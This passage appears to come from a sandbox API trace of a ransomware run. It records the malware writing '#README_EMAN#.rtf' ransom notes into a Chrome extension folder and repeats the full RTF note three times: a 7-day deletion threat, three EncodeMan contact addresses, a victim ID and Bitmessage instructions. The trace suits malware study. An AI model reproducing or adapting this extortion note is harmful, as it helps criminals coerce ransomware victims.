data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\#readme_eman#.rtf")) returned 0xffffffff [0291.110] GetLastError () returned 0x2 [0291.110] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.110] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.110] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.110] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd 